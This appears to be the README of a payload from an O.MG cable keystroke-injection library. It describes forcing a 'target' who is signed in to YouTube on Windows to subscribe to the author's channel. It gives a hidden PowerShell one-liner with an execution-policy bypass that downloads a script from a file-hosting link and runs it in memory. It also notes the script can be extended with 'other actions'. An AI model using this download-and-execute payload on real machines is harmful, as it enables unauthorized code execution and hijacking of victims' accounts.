omg-payloads/payloads/library/general/-OMG-Subscribe
I-Am-Jakoby 259bc62d77
Add files via upload
2022-05-09 22:42:25 -05:00
..
README.md Add files via upload 2022-05-09 22:42:25 -05:00
Subscribe-Execute.txt Add files via upload 2022-05-09 22:42:25 -05:00
Subscribe.ps1 Add files via upload 2022-05-09 22:42:25 -05:00
Subscribe.txt Add files via upload 2022-05-09 22:42:25 -05:00

README.md

Logo

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Subscribe

A script I put together to make your target subscribe to your youtube channel

Description

This script is set to run with 2 different methods.
Either you use straight keystroke injection with no dependencies Or you use an Invoke-WebRequest to download and execute a powershell script that will do the same thing (With the powershell script you have the ability to modify it and add other actions) Either way your target will be directed to your youtube page where they will be made to subscribe to you

Getting Started

Dependencies

  • DropBox or other file hosting service - Your Shared link for the intended file
  • Windows 10,11
  • Your target will have to be signed into their youtube account

(back to top)

Executing program

  • Plug in your device
  • Either a straight keystroke injection will be used
  • OR
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl

(back to top)

Contributing

All contributors names will be listed here

I am Jakoby

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

I am Jakoby


Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Subscribe)

(back to top)

Acknowledgments

(back to top)